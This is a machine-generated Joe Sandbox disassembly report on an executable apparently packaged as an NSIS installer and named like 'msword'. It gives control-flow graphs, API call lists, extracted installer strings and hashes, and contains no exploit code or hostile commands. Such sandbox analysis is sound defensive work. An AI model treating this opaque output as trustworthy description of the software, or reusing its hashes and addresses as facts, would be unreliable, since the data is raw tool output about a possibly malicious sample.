                                          • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                          • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                          • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 825 406301-406315 FindFirstFileW 826 406322 825->826 827 406317-406320 FindClose 825->827 828 406324-406325 826->828 827->828
                                          APIs
                                          • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                          • FindClose.KERNEL32(00000000), ref: 00406318
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID: jF
                                          • API String ID: 2295610775-3349280890
                                          • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                          • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                          • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                          • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                          • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: AddressHandleLibraryLoadModuleProc
                                          • String ID:
                                          • API String ID: 310444273-0
                                          • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                          • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                          • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                          • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 88 4030ee-4030f2 57->88 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->88 92 401751-401755 ShowWindow 61->92 93 401758-40175f 61->93 114 4019a3-4019a8 62->114 115 40197f-401984 62->115 63->57 121 4019ec-4019f8 63->121 64->57 135 40179a-4017a6 call 4062cf 64->135 65->88 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 136 401689-40168e call 404f9e 67->136 141 4016b1-4016b8 Sleep 68->141 142 4016ae-4016b0 68->142 69->88 89 401632-401637 70->89 86 401702-401710 71->86 87 4016dd-4016fd call 401446 71->87 91 4030dd-4030de 72->91 137 4018c2-4018d6 call 4062cf 73->137 138 4018a9-4018bd call 4062cf 73->138 171 401912-401919 74->171 172 40191e-401921 74->172 75->89 90 401647-40164e PostQuitMessage 75->90 76->57 86->57 87->57 89->88 90->89 91->57 116 4030de call 405f7d 91->116 92->93 93->57 110 401765-401769 ShowWindow 93->110 110->57 128 4019af-4019b2 114->128 127 401986-401989 115->127 115->128 116->57 121->57 121->91 127->128 139 40198b-401993 call 406301 127->139 128->57 143 4019b8-4019c5 GetShortPathNameW 128->143 155 4017ab-4017ac 135->155 136->57 137->88 138->88 139->114 163 401995-4019a1 call 406035 139->163 141->57 142->141 143->57 155->57 167 401890-401892 160->167 168 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->168 175 401846-40184e call 4062cf 161->175 176 4017fe-401809 GetLastError 161->176 163->128 167->136 168->57 171->136 177 401923-40192b call 406301 172->177 178 40194a-401950 172->178 190 401853-401854 175->190 180 401827-401832 GetFileAttributesW 176->180 181 40180b-401825 GetLastError call 4062cf 176->181 177->178 196 40192d-401948 call 406c94 call 404f9e 177->196 185 401957-40195d call 4062cf 178->185 188 401834-401844 call 4062cf 180->188 189 401855-40185e 180->189 181->189 185->155 188->190 189->160 189->161 190->189 196->185
                                          APIs
                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                          • ShowWindow.USER32(?), ref: 00401753
                                          • ShowWindow.USER32(?), ref: 00401767
                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                          • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                          Strings
                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                          • detailprint: %s, xrefs: 00401679
                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                          • Call: %d, xrefs: 0040165A
                                          • Rename: %s, xrefs: 004018F8
                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                          • Sleep(%d), xrefs: 0040169D
                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                          • BringToFront, xrefs: 004016BD
                                          • Rename failed: %s, xrefs: 0040194B
                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                          • Aborting: "%s", xrefs: 0040161D
                                          • SetFileAttributes failed., xrefs: 004017A1
                                          • Rename on reboot: %s, xrefs: 00401943
                                          • Jump: %d, xrefs: 00401602
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                          • API String ID: 2872004960-3619442763
                                          • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                          • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                          • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                          • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 329 4054d4-4054e1 SetWindowPos 326->329 330 4054e7-4054ea 326->330 332 4056ac-4056b1 call 403ddb 327->332 333 40566e-405671 327->333 328->327 329->330 335 405504-40550a 330->335 336 4054ec-4054fe ShowWindow 330->336 340 4056b6-4056d1 332->340 338 405673-40567e call 40139d 333->338 339 4056a4-4056a6 333->339 341 405526-405529 335->341 342 40550c-405521 DestroyWindow 335->342 336->335 338->339 360 405680-40569f SendMessageW 338->360 339->332 345 40594c 339->345 346 4056d3-4056d5 call 40141d 340->346 347 4056da-4056e0 340->347 351 40552b-405537 SetWindowLongW 341->351 352 40553c-405542 341->352 349 405929-40592f 342->349 348 40594e-405955 345->348 346->347 356 4056e6-4056f1 347->356 357 40590a-405923 DestroyWindow KiUserCallbackDispatcher 347->357 349->345 354 405931-405937 349->354 351->348 358 4055e5-4055f4 call 403df6 352->358 359 405548-405559 GetDlgItem 352->359 354->345 362 405939-405942 ShowWindow 354->362 356->357 363 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 356->363 357->349 358->348 364 405578-40557b 359->364 365 40555b-405572 SendMessageW IsWindowEnabled 359->365 360->348 362->345 393 405746-40574c 363->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 363->394 368 405580-405583 364->368 369 40557d-40557e 364->369 365->345 365->364 372 405591-405596 368->372 373 405585-40558b 368->373 371 4055ae-4055b3 call 403d44 369->371 371->358 374 4055cc-4055df SendMessageW 372->374 376 405598-40559e 372->376 373->374 375 40558d-40558f 373->375 374->358 375->371 379 4055a0-4055a6 call 40141d 376->379 380 4055b5-4055be call 40141d 376->380 389 4055ac 379->389 380->358 390 4055c0-4055ca 380->390 389->371 390->389 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->340 411 40581f-405821 402->411 411->340 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->349 416 405864-405891 CreateDialogParamW 413->416 414->345 415 405839-40583f 414->415 415->340 417 405845 415->417 416->349 418 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->418 417->345 418->345 423 4058f0-405903 ShowWindow call 403ddb 418->423 425 405908 423->425 425->349
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                          • ShowWindow.USER32(?), ref: 004054FE
                                          • DestroyWindow.USER32 ref: 00405512
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                          • GetDlgItem.USER32(?,?), ref: 0040554F
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                          • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                          • GetDlgItem.USER32(?,00000001), ref: 00405619
                                          • GetDlgItem.USER32(?,00000002), ref: 00405623
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                          • GetDlgItem.USER32(?,00000003), ref: 00405734
                                          • ShowWindow.USER32(00000000,?), ref: 00405756
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                          • EnableWindow.USER32(?,?), ref: 00405783
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                          • EnableMenuItem.USER32(00000000), ref: 004057A0
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                          • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                          • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                          • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID:
                                          • API String ID: 3282139019-0
                                          • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                          • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                          • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                          • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 446 405a19-405a41 call 405eff 445->446 446->444 453 405a43-405a47 446->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 464 405a69-405a77 lstrcmpiW 458->464 465 405a8f-405a97 call 40674e call 406035 458->465 459->455 476 405ba4-405baf call 403ec1 460->476 477 405b9c-405b9f 460->477 467 405c61 461->467 468 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->468 464->465 473 405a79-405a83 GetFileAttributesW 464->473 465->444 472 405c63-405c6a 467->472 468->460 478 405a85-405a87 473->478 479 405a89-405a8a call 40677d 473->479 484 405bb5-405bd2 ShowWindow LoadLibraryW 476->484 485 405c38-405c39 call 405073 476->485 477->472 478->465 478->479 479->465 487 405bd4-405bd9 LoadLibraryW 484->487 488 405bdb-405bed GetClassInfoW 484->488 489 405c3e-405c40 485->489 487->488 490 405c05-405c28 DialogBoxParamW call 40141d 488->490 491 405bef-405bff GetClassInfoW RegisterClassW 488->491 492 405c42-405c48 489->492 493 405c5a-405c5c call 40141d 489->493 497 405c2d-405c36 call 403c94 490->497 491->490 492->477 495 405c4e-405c55 call 40141d 492->495 493->467 495->477 497->472
                                          APIs
                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                          • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                          • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                          • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                          • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                          • RegisterClassW.USER32(00476A40), ref: 00405B36
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                            • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                          • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                          • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                          • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                          • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                          • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                          • API String ID: 608394941-2746725676
                                          • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                          • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                          • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                          • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          • lstrcatW.KERNEL32(00000000,00000000,229,004D70B0,00000000,00000000), ref: 00401A76
                                          • CompareFileTime.KERNEL32(-00000014,?,229,229,00000000,00000000,229,004D70B0,00000000,00000000), ref: 00401AA0
                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004283D1,76F923A0,00000000), ref: 00404FD6
                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FE6
                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FF9
                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                          • String ID: 229$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                          • API String ID: 4286501637-2892758339
                                          • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                          • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                          • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                          • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 633 40375f-403765 609->633 610->606 638 403797-4037a8 610->638 613 403670-403677 611->613 614 4037e9-4037f0 call 4032d2 611->614 618 4036f3-4036f7 613->618 619 403679-40368d call 405e38 613->619 614->606 622 403701-403707 618->622 623 4036f9-403700 call 4032d2 618->623 619->622 636 40368f-403696 619->636 629 403716-403720 622->629 630 403709-403713 call 4072ad 622->630 623->622 629->602 637 403726 629->637 630->629 633->606 633->610 636->622 642 403698-40369f 636->642 637->600 639 4037b0-4037b3 638->639 640 4037aa 638->640 643 4037b6-4037be 639->643 640->639 642->622 644 4036a1-4036a8 642->644 643->643 646 4037c0-4037db SetFilePointer call 405e38 643->646 644->622 645 4036aa-4036b1 644->645 645->622 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->622 653 4036ef-4036f1 651->653 652->637 652->651 653->622
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004035C4
                                          • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                          • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                          Strings
                                          • Inst, xrefs: 00403698
                                          • Error launching installer, xrefs: 00403603
                                          • soft, xrefs: 004036A1
                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                          • Null, xrefs: 004036AA
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
